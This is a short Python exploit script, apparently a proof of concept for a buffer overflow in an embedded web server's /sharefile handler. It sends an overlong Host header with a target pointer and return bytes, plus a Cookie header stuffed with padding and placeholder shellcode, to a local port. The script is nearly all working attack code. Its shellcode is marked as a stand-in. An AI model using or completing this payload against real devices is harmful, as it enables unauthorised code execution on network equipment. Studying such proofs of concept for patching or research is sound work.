1234567891011121314151617181920212223242526 |
- import socket
- p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- p.connect(("127.0.0.1" , 18080))
- shellcode = "A"*0x200 # *** Not the correct shellcode for exploit ***
- rn = "\r\n"
- strptr = "\x60\x70\xff\x7f"
- padding = "\x00\x00\x00\x00"
- payload = "GET /sharefile?test=A" + "HTTP/1.1" + rn
- payload += "Host: " + "A"*0x70 + strptr*2 + "A"*0x24 + "\xb8\xfe\x48" + rn
- payload += "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0" + rn
- payload += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn
- payload += "Accept-Language: en-US,en;q=0.5" + rn
- payload += "Accept-Encoding: gzip, deflate" + rn
- payload += "Cookie: curShow=; ac_login_info=passwork; test=A" + padding*0x200 + shellcode + padding*0x4000 + rn
- payload += "Connection: close" + rn
- payload += "Upgrade-Insecure-Requests: 1" + rn
- payload += rn
- p.send(payload)
- print(p.recv(4096))
|